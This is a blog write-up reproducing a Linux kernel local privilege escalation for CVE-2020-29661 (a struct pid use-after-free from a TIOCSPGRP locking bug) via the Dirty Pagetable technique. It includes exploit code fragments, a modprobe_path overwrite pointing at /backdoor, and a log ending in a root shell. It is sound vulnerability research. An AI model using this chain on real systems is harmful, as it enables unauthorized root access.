Reproducing CVE-2020-29661

T1d 2024-9-23

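While reading "Dirty Pagetable: A Novel Exploitation Technique To Rule Linux Kernel", I noticed that the article does not describe the exploitation of CVE-2020-29661 in much detail, and I could not find a detailed public exploit online either. The only one available, written by the researcher who originally reported the bug, did not work for me for several reasons. I therefore decided to reproduce the vulnerability myself with the Dirty Pagetable technique, drawing on the available material.

Reproduction environment and source repository: https://github.com/TLD1027/CVE-2020-29661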

Patch

diff --git a/drivers/tty/tty_jobctrl.c b/drivers/tty/tty_jobctrl.c
index 28a23a0fef21c3..baadeea4a289bf 100644
--- a/drivers/tty/tty_jobctrl.c
+++ b/drivers/tty/tty_jobctrl.c
@@ -494,10 +494,10 @@ static int tiocspgrp(struct tty_struct *tty, struct tty_struct *real_tty, pid_t
 	if (session_of_pgrp(pgrp) != task_session(current))
 		goto out_unlock;
 	retval = 0;
-	spin_lock_irq(&tty->ctrl_lock);
+	spin_lock_irq(&real_tty->ctrl_lock);
 	put_pid(real_tty->pgrp);
 	real_tty->pgrp = get_pid(pgrp);
-	spin_unlock_irq(&tty->ctrl_lock);
+	spin_unlock_irq(&real_tty->ctrl_lock);
 out_unlock:
 	rcu_read_unlock();
 	return retval;

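Vulnerability analysis

At first glance the code is properly locked with spin_lock_irq, but put_pid operates on real_tty while the lock that is taken belongs to tty. Two callers that reach the same real_tty through different tty objects (for example the two ends of a pty pair) therefore hold different locks and do not exclude each other. Consider the following interleaving during a race: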

  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)
  ioctl(fd1, TIOCSPGRP, pid_A)        ioctl(fd2, TIOCSPGRP, pid_B)
    spin_lock_irq(...)                  spin_lock_irq(...)
    put_pid(old_pid)
                                        put_pid(old_pid)
    real_tty->pgrp = get_pid(A)
                                        real_tty->pgrp = get_pid(B)
    spin_unlock_irq(...)                spin_unlock_irq(...)

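In these interleavings the reference count of old_pid is decremented one extra time, so the pid structure is freed while references to it still exist, which gives a use-after-free on struct pid.

Exploitation

The exploit is built mainly on the Dirty Pagetable technique. The first step is a cross-cache attack that gets the slab holding the vulnerable object returned to the page allocator. struct pid is allocated from a dedicated kmem_cache, so my first attempt was to spray pid objects, which ran into two problems. First, to make sure the forked processes could be released on demand I used flags in shared memory, which means every child has to spin in a loop polling its flag; with a large number of children this consumes too many resources and takes too long. Second, reaping the children with wait could appear to block forever, and it was hard to tell whether the release was merely slow because of the number of processes or whether a process was stuck. So I went back to the material published by the researcher who first reported the bug: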
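To make the lost reference concrete, here is a minimal user-space model of the interleaving shown above. It is only a sketch: the toy_pid and toy_tty types and the replay_race function are made-up names, plain integers stand in for the kernel's reference counts, and the "race" is replayed sequentially in the order of the diagram rather than with real threads.

```c
/* Toy stand-ins for struct pid and struct tty_struct (hypothetical names). */
struct toy_pid { int count; };
struct toy_tty { struct toy_pid *pgrp; };

static void toy_put(struct toy_pid *p) { p->count--; }
static struct toy_pid *toy_get(struct toy_pid *p) { p->count++; return p; }

/*
 * Replays the interleaving from the diagram. Both callers believe they
 * hold "the" lock, but the locks are different objects, so nothing stops
 * the second put from seeing the same old pointer as the first.
 * Returns the final reference count of the old pid.
 */
static int replay_race(void)
{
    /* old starts with two references: one held by the tty, one by its task */
    struct toy_pid old = { 2 }, a = { 1 }, b = { 1 };
    struct toy_tty real_tty = { &old };

    toy_put(real_tty.pgrp);          /* caller 1: put_pid(old_pid)        */
    toy_put(real_tty.pgrp);          /* caller 2: put_pid(old_pid) again  */
    real_tty.pgrp = toy_get(&a);     /* caller 1 stores pid A             */
    real_tty.pgrp = toy_get(&b);     /* caller 2 overwrites it with pid B */

    return old.count;                /* 0: the task's reference was dropped too */
}
```

In this model the tty only ever owned one of old's references, yet two were dropped, so the count reaches zero while the task still uses the object. As a side effect the reference taken on A is never released, because the pointer to it is overwritten.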

https://googleprojectzero.blogspot.com/2021/10/how-simple-linux-kernel-memory.html

https://project-zero.issues.chromium.org/issues/42451236

After reading them I found that the author's exploit uses the seq_file structure:

/*
 * The child pid should be in a page together with a bunch of seqfiles
 * allocations and nothing else.
 */
int seqfiles[32*2];
for (int i=0; i<32; i++)
  seqfiles[i] = SYSCHK(open("/proc/self/maps", O_RDONLY));

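This is presumably an effect of slab aliasing (cache merging), which makes both object types come from the same slab, so simply opening /proc/self/maps is enough to spray. For the cross-cache step, however, we first have to trigger the bug and get the pid freed, which raises a question: how do we tell whether the race has succeeded?

Going back to the original write-up, the author observes that if we can first raise the reference count to a large value, then run the race to skew it downwards, and afterwards drop the references we created one at a time, some observable signal will tell us the moment the structure has been freed. Fortunately, they did find such a method: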

On typical desktop/server distributions, the following approach works (unreliably, depending on RAM size) for setting up a freed struct pid with multiple dangling references:

1. Allocate a new struct pid (by creating a new task).

2. Create a large number of references to it (by sending messages with SCM_CREDENTIALS to unix domain sockets, and leaving those messages queued up).

3. Repeatedly trigger the TIOCSPGRP race to skew the reference count downwards, with the number of attempts chosen such that we expect that the resulting refcount skew is bigger than the number of references we need for the rest of our attack, but smaller than the number of extra references we created.

4. Let the task owning the pid exit and die, and wait for RCU (read-copy-update, a mechanism that involves delaying the freeing of some objects) to settle such that the task's reference to the pid is gone. (Waiting for an RCU grace period from userspace is not a primitive that is intentionally exposed through the UAPI, but there are various ways userspace can do it - e.g. by testing when a released BPF program's memory is subtracted from memory accounting, or by abusing the membarrier(MEMBARRIER_CMD_GLOBAL, ...) syscall after the kernel version where RCU flavors were unified.)

5. Create a new thread, and let that thread attempt to drop all the references we created.

Because the refcount is smaller at the start of step 5 than the number of references we are about to drop, the pid will be freed at some point during step 5; the next attempt to drop a reference will cause a use-after-free:

struct upid {
        int nr;
        struct pid_namespace *ns;
};

struct pid
{
        atomic_t count;
        unsigned int level;
        /* lists of tasks that use this pid */
        struct hlist_head tasks[PIDTYPE_MAX];
        struct rcu_head rcu;
        struct upid numbers[1];
};
[...]
void put_pid(struct pid *pid)
{
        struct pid_namespace *ns;

        if (!pid)
                return;

        ns = pid->numbers[pid->level].ns;
        if ((atomic_read(&pid->count) == 1) ||
             atomic_dec_and_test(&pid->count)) {
                kmem_cache_free(ns->pid_cachep, pid);
                put_pid_ns(ns);
        }
}

When the object is freed, the SLUB allocator normally replaces the first 8 bytes (sidenote: a different position is chosen starting in 5.7, see Kees' blog) of the freed object with an XOR-obfuscated freelist pointer; therefore, the count and level fields are now effectively random garbage. This means that the load from pid->numbers[pid->level] will now be at some random offset from the pid, in the range from zero to 64 GiB. As long as the machine doesn't have tons of RAM, this will likely cause a kernel segmentation fault. (Yes, I know, that's an absolutely gross and unreliable way to exploit this. It mostly works though, and I only noticed this issue when I already had the whole thing written, so I didn't really want to go back and change it... plus, did I mention that it mostly works?)

Linux in its default configuration, and the configuration shipped by most general-purpose distributions, attempts to fix up unexpected kernel page faults and other types of "oopses" by killing only the crashing thread. Therefore, this kernel page fault is actually useful for us as a signal: Once the thread has died, we know that the object has been freed, and can continue with the rest of the exploit.

If this code looked a bit differently and we were actually reaching a double-free, the SLUB allocator would also detect that and trigger a kernel oops (see set_freepointer() for the CONFIG_SLAB_FREELIST_HARDENED case).
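Two pieces of arithmetic in the quoted passage are easy to check by hand. The sketch below is my own illustration, not code from the original exploit: max_level_offset reproduces the "zero to 64 GiB" bound under the assumption that struct upid occupies 16 bytes on x86-64, and drop_that_frees models steps 2 to 5 as plain counting. Both function names and the TOY_UPID_SIZE constant are made up.

```c
#include <stdint.h>

/* Assumption: struct upid { int nr; struct pid_namespace *ns; } is padded
 * to 16 bytes on x86-64. */
#define TOY_UPID_SIZE 16ULL

/* Largest byte displacement of numbers[level] when level is an arbitrary
 * 32-bit value, as it is after the freelist pointer overwrote it. */
static uint64_t max_level_offset(void)
{
    return (uint64_t)UINT32_MAX * TOY_UPID_SIZE;
}

/*
 * Steps 2-5 as counting. `extra` references were queued up (step 2), the
 * race removed `skew` references that nobody gave up (step 3), and the
 * task's own reference is gone (step 4). Returns the 1-based index of the
 * drop in step 5 that frees the object, or 0 if none does. Every drop
 * after that one touches freed memory.
 */
static int drop_that_frees(int extra, int skew)
{
    int count = extra - skew;
    for (int i = 1; i <= extra; i++) {
        if (--count == 0)
            return i;
    }
    return 0;
}
```

With 100 queued references and a skew of 30, for instance, the 70th drop frees the object and the remaining 30 drops are use-after-free accesses, which is why the skew only has to land somewhere between the number of references needed later and the number created.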

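However, this never worked in my attempts. I found that pid->level in pid->numbers[pid->level] becomes a very large random value. The first challenge is that this access must not land in unreadable memory, which means the address space behind it has to be large enough. On top of that, the ns value obtained this way is then used further: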

kmem_cache_free(ns->pid_cachep, pid);
put_pid_ns(ns);

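The second challenge is that the pid_cachep it points to has to be a kernel heap address, otherwise the call to kmem_cache_free will not go through.

Next, look at put_pid_ns: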

void put_pid_ns(struct pid_namespace *ns)
{
	struct pid_namespace *parent;

	while (ns != &init_pid_ns) {
		parent = ns->parent;
		if (!kref_put(&ns->kref, free_pid_ns))
			break;
		ns = parent;
	}
}

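Judging from the original exploit, the author decides that the UAF has been triggered once the process is observed to stall. From this function one can guess that the exit condition of the while loop is never met, so the third challenge is that the ns->parent chain must happen to form a cycle in which no element satisfies the exit condition. Based on this analysis, I tentatively concluded that the original exploit only works under idealized conditions, or with a very low probability, so we need a new way to detect whether the pid structure has hit the UAF.

With a hint from my team lead, I did find a simpler and faster way to tell whether the structure has been freed: check the process ID with getpid. Observation shows that the child's refcount starts at 2 when the race begins, so if the race succeeds and hits the child, the child's pid is already freed after a single round. If we fork a new process right away, it takes over the child's original struct pid and overwrites the process ID stored in it. In other words, we only need to check whether the child's process ID has changed to know whether its pid was freed. The key code is: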

for(child_i = 0; child_i < MAX_FORK_NUM; child_i++)
    {
        pid_t child = SYSCHK(fork());
        if (child == 0)
        {
            SYSCHK(prctl(PR_SET_PDEATHSIG, SIGKILL));
            pin_cpu(1);
            SYSCHK(setpgid(0, 0));
            child = getpid();
            for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
            {
                while (1)
                {
                    char syncval = *syncptr;
                    if ((syncval & 1) == 0)
                    {
                        if (syncval == 10)
                            break;
                        *syncptr = syncval + 1;
                    }
                }
                SYSCHK(ioctl(tty, TIOCSPGRP, &parent));
                *syncptr = 11;
            }
            while(1)
            {
                if(*(syncptr + child_i + 0x100) == 1)
                {
                    if(getpid() == child){
                        *(syncptr + child_i + 0x100) = 2;   // continue
                        while(1){
                            if(*(syncptr + child_i + 0x100) == 4)
                            {
                                *(syncptr + child_i + 0x200) = 1;   // exit the new fork;
                                exit(0);
                            }
                        }
                    }
                    else{
                        printf("[*] child : %d, new-child : %d\n", child, getpid());
                        *(syncptr + child_i + 0x100) = 3;   // find the uaf pid
                        while(1){
                            if(*(syncptr + child_i + 0x100) == 4) {
                                printf("[*] Free the uaf pid again\n");
                                *(syncptr + child_i + 0x200) = 1;   // exit the new fork;
                                while(1)
                                {
                                    if(*(syncptr + child_i + 0x100) == 10)
                                    {
                                        SYSCHK(listen(listensock, 128));
                                        *(syncptr + child_i + 0x100) = 9;
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
        for (int attempts = 0; attempts < SKEW_ATTEMPTS; attempts++)
        {
            SYSCHK(ioctl(ptmx, TIOCSPGRP, &child));
            *syncptr = 0;
            while (1)
            {
                char syncval = *syncptr;
                if ((syncval & 1) == 1)
                {
                    *syncptr = syncval + 1;
                    if (syncval == 9)
                        break;
                }
            }
            SYSCHK(ioctl(ptmx, TIOCSPGRP, &parent));
            while (*syncptr != 11)
                ;
        }
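        /* Fork right away: if the race freed the child's struct pid, this
         * new process is expected to reuse that same struct pid. */
        int fake = fork();
        if(fake == 0)
        {
            while(1){
                if(*(syncptr + child_i + 0x200) == 1) exit(0);
            }
        }
        /* state 1: ask the child to compare getpid() with its saved pid */
        *(syncptr + 0x100 + child_i) = 1;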
        while(1)
        {
            if(*(syncptr + child_i + 0x100) == 2)
            {
                 break;
            }else if(*(syncptr + child_i + 0x100) == 3)
            {
                break;
            }
        }

        if(*(syncptr + child_i + 0x100) == 3)
        {
            printf("[*] Find the uaf pid in child : %d\n", child_i);
            break;
        }
    }

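With this method the freed pid structure is found quickly. What follows is a regular cross-cache step, after which a large number of PTE page tables are sprayed to occupy the slab page that held the pid structure.

Because the pid has been freed, the only way to operate on it without causing a kernel panic is to increment its refcount. We therefore need a page table entry at every position in the PTE page that may coincide with a pid refcount: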

struct pid {
	refcount_t                 count;                /*     0     4 */
	unsigned int               level;                /*     4     4 */
	spinlock_t                 lock;                 /*     8     4 */

	/* XXX 4 bytes hole, try to pack */

	struct hlist_head          tasks[4];             /*    16    32 */
	struct hlist_head          inodes;               /*    48     8 */
	wait_queue_head_t          wait_pidfd;           /*    56    24 */
	/* --- cacheline 1 boundary (64 bytes) was 16 bytes ago --- */
	struct callback_head       rcu;                  /*    80    16 */
	struct upid                numbers[];            /*    96     0 */

	/* size: 96, cachelines: 2, members: 8 */
	/* sum members: 92, holes: 1, sum holes: 4 */
	/* last cacheline: 32 bytes */
};

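So it is enough to place a PTE in the first 8 bytes of every object slot.

When the refcount is then incremented, we can identify the virtual address that corresponds to the vulnerable pid structure by checking which virtual address sees its contents change. To increment the refcount we use the method described by the original author: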
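Which user pages have to be touched follows from simple index arithmetic. The sketch below is an illustration under two assumptions that are mine: the pid objects sit in 128-byte slots (inferred from the 0x10000 stride between the addresses printed in the sample output), and the sprayed region starts on a 2 MiB boundary so that one page-table page covers it from entry 0. The names va_for_slot and slots_per_page are hypothetical.

```c
#include <stdint.h>

#define PAGE_SIZE_BYTES 4096ULL   /* size of one page and of one page-table page */
#define PTE_SIZE_BYTES  8ULL      /* size of one page table entry on x86-64      */

/* Number of object slots in one 4 KiB slab page. */
static unsigned slots_per_page(unsigned obj_size)
{
    return (unsigned)(PAGE_SIZE_BYTES / obj_size);
}

/*
 * Virtual address whose PTE overlaps the first 8 bytes (the refcount) of
 * slot number `slot`, for a region that starts at `region_base` and is
 * mapped by the page-table page that replaced the slab page.
 */
static uint64_t va_for_slot(uint64_t region_base, unsigned slot, unsigned obj_size)
{
    uint64_t pte_index = (uint64_t)slot * obj_size / PTE_SIZE_BYTES;
    return region_base + pte_index * PAGE_SIZE_BYTES;
}
```

Under these assumptions only every 16th page of the region needs to be faulted in, 32 pages per page-table page, which keeps the spray small.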

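void add_to_refcount(int count, int listensock)
{
    for (int i = 0; i < count; i++)
    {
        /* each iteration leaves two descriptors open: refsock and the accepted one */
        int refsock = SYSCHK(socket(AF_UNIX, SOCK_STREAM, 0));
        SYSCHK(connect(refsock, (struct sockaddr *)&unix_addr, sizeof(unix_addr)));
        /* note: SYSCHK sees the result of the comparison, not accept()'s return value */
        SYSCHK(accept(listensock, NULL, NULL) == -1);
    }
}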

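This approach is subject to resource limits, though: even with the per-process file descriptor limit raised to its maximum it is only 4096, while a single step needs at least 0x1000 increments to make the PTE point to the next physical page. The limit therefore has to be bypassed with child processes: each process can only hold a limited number of open descriptors, but if we create many children, each of them can keep adding references.

I started with the simplest approach and forked one child to add references, but it soon failed with an error saying the limit had been reached. Suspecting that there were too few children, I forked more, with the same result. Debugging showed that no matter how many processes I started, the count always hit a ceiling. From what I read, this is because fork inherits the parent's file descriptors, which makes that approach unworkable. I then noticed that clone can also create a child process and, as I understood it, can be told not to inherit the file descriptors, so I switched the increments to clone, and that did increment the PTE successfully. (With only SIGCHLD in the flags, as in the code below, clone still copies the descriptor table the way fork does, so the limit may have been avoided for a different reason than the one assumed here.)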
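The numbers in this paragraph can be written down as a small model. This is a sketch under stated assumptions: the refcount is treated as a plain 32-bit counter overlapping the low half of the PTE, refcount saturation is ignored, and the helper names are made up. The 0x400 increments per child match the value used in the clone example in this post.

```c
#include <stdint.h>

/*
 * Effect of n refcount increments on a PTE whose low 32 bits are overlaid
 * by the refcount. Only the low half changes; the high half, including the
 * NX bit, stays as it was. The physical frame number starts at bit 12, so
 * 0x1000 increments move the entry to the next physical page.
 */
static uint64_t pte_after_increments(uint64_t pte, uint32_t n)
{
    uint32_t low = (uint32_t)pte + n;
    return (pte & 0xffffffff00000000ULL) | low;
}

/* Number of child processes needed when each child adds `per_child` references. */
static unsigned children_needed(unsigned increments, unsigned per_child)
{
    return (increments + per_child - 1) / per_child;
}
```

Applied to the PTE value from the sample output, 0x800000013fe6a067 becomes 0x800000013fe6b067 after 0x1000 increments, and four children at 0x400 references each are enough for that one step.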

int child_func(void *arg) {
    int num = *((int *)arg);
    add_to_refcount(num, listensock);
    sleep(1);
    while (1) {}
}

int main()
{
    ...
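    char *stack;
    char *stack_top;
#define STACK_SIZE (1024 * 1024)
    // allocate a stack for the child
    stack = malloc(STACK_SIZE);
    if (stack == NULL) {
        perror("malloc");
        exit(EXIT_FAILURE);
    }
    stack_top = stack + STACK_SIZE;   // the stack grows down, so pass its top

    int flags = SIGCHLD;              // signal sent to the parent when the child exits

    // create the child; it adds `times` references and then idles
    int times = 0x400;
    if (clone(child_func, stack_top, flags, &times) == -1) {
        perror("clone");
        exit(EXIT_FAILURE);
    }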
    ...
}

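As long as every virtual page is tagged in advance with its own virtual address, checking the pages one by one after the increments reveals the virtual address that corresponds to the vulnerable object.

Once the user address backed by the PTE that overlaps the vulnerable object is known, repeated increments can point that PTE at other physical addresses. However, the physical pages handed out by mmap are not adjacent to the kernel image or to page-table pages, and we only have an increment primitive, no decrement. We therefore rely on the fact that the shared pages allocated by dma-buf come from the same physical region as page-table pages, which lets us build the following layout: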
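The tagging and scanning step is ordinary user-space code. The sketch below shows one way to write it; tag_pages and find_remapped are hypothetical names, and the region is modelled as an array of 64-bit words so that the logic can be exercised on any buffer.

```c
#include <stddef.h>
#include <stdint.h>

/* Writes each page's own address into its first 8 bytes. */
static void tag_pages(uint64_t *region, size_t npages, size_t words_per_page)
{
    for (size_t i = 0; i < npages; i++) {
        uint64_t *page = region + i * words_per_page;
        page[0] = (uint64_t)(uintptr_t)page;
    }
}

/*
 * Returns the index of the first page whose tag no longer matches its own
 * address, or -1 if every page still shows its own tag. A mismatch means
 * the PTE behind that page now points at another page's frame.
 */
static long find_remapped(const uint64_t *region, size_t npages, size_t words_per_page)
{
    for (size_t i = 0; i < npages; i++) {
        const uint64_t *page = region + i * words_per_page;
        if (page[0] != (uint64_t)(uintptr_t)page)
            return (long)i;
    }
    return -1;
}
```

The sample output further down shows exactly this situation: the page at 0x10000290000 reads back the tag 0x100002a0000, so its PTE is the one that overlaps the refcount.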

|-------|
|  ...  |
|-------|
|  PTE  |
|-------|
|  DMA  |
|-------|
|  PTE  |
|-------|
|  ...  |
|-------|

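Incrementing the physical address of the DMA shared page then maps the neighbouring PTE page-table page into user space. The overall flow is:

1. Allocate 10 user page tables.

2. Use the increment primitive to make one physical page appear at two different virtual pages, which identifies addr1.

3. Release the page behind addr1 and allocate a dma-buf shared page at addr1.

4. Allocate 10 user page tables.

5. Use the increment primitive to change the physical address of the dma-buf page into that of a page-table page, which is then mapped at virtual address addr1.

6. Read addr1 to check whether the mapping succeeded. If it did, add 0x1000 to the entry read at addr1 so that the physical page originally mapped at addr3 is now mapped at addr2, and find addr2 the same way as before.

At this point we have a controllable page-table page at addr1 and the virtual page addr2 that it maps. We can now walk physical memory from its start, reading through addr2 to decide whether we have reached the physical base of the kernel image. Once the physical base is found, we keep scanning for the physical address of modprobe_path, overwrite it so that it names our /backdoor program, and run /error to make the kernel execute /backdoor, which modifies /etc/passwd. Alternatively, the kernel text can be patched directly to escape.

Result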
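The scan described above boils down to two helpers: one fills the controlled page-table page with entries for a 2 MiB physical window, the other searches the bytes visible through those mappings. The sketch below is an illustration only. The names fill_window and find_bytes are made up, and the flag value 0x8000000000000067 (NX, dirty, accessed, user, writable, present) is taken from the PTE values printed in the sample output.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define PTE_FLAGS       0x8000000000000067ULL  /* NX | dirty | accessed | user | rw | present */
#define PTES_PER_TABLE  512

/* Points all 512 entries of a page-table page at consecutive physical
 * pages starting at phys_base, i.e. one 2 MiB window. */
static void fill_window(uint64_t *table, uint64_t phys_base)
{
    for (int i = 0; i < PTES_PER_TABLE; i++)
        table[i] = (phys_base + (uint64_t)i * 0x1000ULL) | PTE_FLAGS;
}

/* Returns the offset of the first occurrence of `needle` in the buffer,
 * or -1 if it does not occur. */
static long find_bytes(const unsigned char *hay, size_t hay_len, const char *needle)
{
    size_t n = strlen(needle);
    if (n == 0 || n > hay_len)
        return -1;
    for (size_t i = 0; i + n <= hay_len; i++) {
        if (memcmp(hay + i, needle, n) == 0)
            return (long)i;
    }
    return -1;
}
```

In the real exploit each window only becomes readable after the stale TLB entries for the old mappings are gone, and a hit on "/sbin/modprobe" still has to be verified, since the log below shows one false positive before the real modprobe_path is found.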

[+] Boot took 2.05
[*] starting up...
[*] Increased fd limit from 1024 to 4096
[*] prepare PTE memory...
[*] executing in first level child process, setting up session and PTY pair...
[*] Begin cc1
[*] Begin cc2
[*] Begin cc3
[*] Launching child process
[*] child : 149, new-child : 150
[*] Find the uaf pid in child : 2
[*] Begin cc4
[*] UAF pid id : 2
[*] Free the uaf pid
[*] Free the uaf pid again
[*] Free finish
[*] Free the struct around uaf pid
[*] Free the struct in first 30 page
[*] Finish cc !
[*] spraying 10 pte's...
[*] spraying finish
[*] Find the pte in 0x10000290000, value 0x100002a0000
[*] Start dma
[*] dma_buf_fd : 7
[*] Start to unmap
[*] spraying finish
[*] Find the dma in 0x10000290000, pte-value 0x800000013fe6a067
[*] Find the pte-1 in 0x10001400000, value 0x10001c00000
[+] pte: 0x8000000050c00067  NUMBER TAG: 0xe801403f51258d48
[*] modprobe path: /sbin/modprobe

[*] setting physical address range to 0x8000000050c00067 - 0x8000000050e00067
[*] setting physical address range to 0x8000000050e00067 - 0x8000000051000067
[*] setting physical address range to 0x8000000051000067 - 0x8000000051200067
[*] setting physical address range to 0x8000000051200067 - 0x8000000051400067
[*] setting physical address range to 0x8000000051400067 - 0x8000000051600067
[*] setting physical address range to 0x8000000051600067 - 0x8000000051800067
[*] setting physical address range to 0x8000000051800067 - 0x8000000051a00067
[*] setting physical address range to 0x8000000051a00067 - 0x8000000051c00067
[*] setting physical address range to 0x8000000051c00067 - 0x8000000051e00067
[*] setting physical address range to 0x8000000051e00067 - 0x8000000052000067
[*] setting physical address range to 0x8000000052000067 - 0x8000000052200067
[*] modprobe path : /sbin/modprobe

[-] false positive. skipping to next one
[*] setting physical address range to 0x8000000052200067 - 0x8000000052400067
[*] setting physical address range to 0x8000000052400067 - 0x8000000052600067
[*] setting physical address range to 0x8000000052600067 - 0x8000000052800067
[*] setting physical address range to 0x8000000052800067 - 0x8000000052a00067
[*] setting physical address range to 0x8000000052a00067 - 0x8000000052c00067
[*] setting physical address range to 0x8000000052c00067 - 0x8000000052e00067
[*] setting physical address range to 0x8000000052e00067 - 0x8000000053000067
[*] setting physical address range to 0x8000000053000067 - 0x8000000053200067
[*] setting physical address range to 0x8000000053200067 - 0x8000000053400067
[*] setting physical address range to 0x8000000053400067 - 0x8000000053600067
[*] setting physical address range to 0x8000000053600067 - 0x8000000053800067
[*] setting physical address range to 0x8000000053800067 - 0x8000000053a00067
[*] setting physical address range to 0x8000000053a00067 - 0x8000000053c00067
[*] setting physical address range to 0x8000000053c00067 - 0x8000000053e00067
[*] setting physical address range to 0x8000000053e00067 - 0x8000000054000067
[*] setting physical address range to 0x8000000054000067 - 0x8000000054200067
[*] setting physical address range to 0x8000000054200067 - 0x8000000054400067
[*] modprobe path : /backdoor

[*] Found modprobe path at physical address 0x0000010001446aa0
/error: line 1: ����: not found
[*] flag : flag{test_flag_ujdbqwdwklqdmwqkldj}

/ $ su root
/ # id
uid=0 gid=0(root) groups=0(root)
/ # cat /etc/passwd
root::0:0:root:/root:/bin/sh
ctf:x:1000:1000:chal:/home/ctf:/bin/sh
/ # 

 
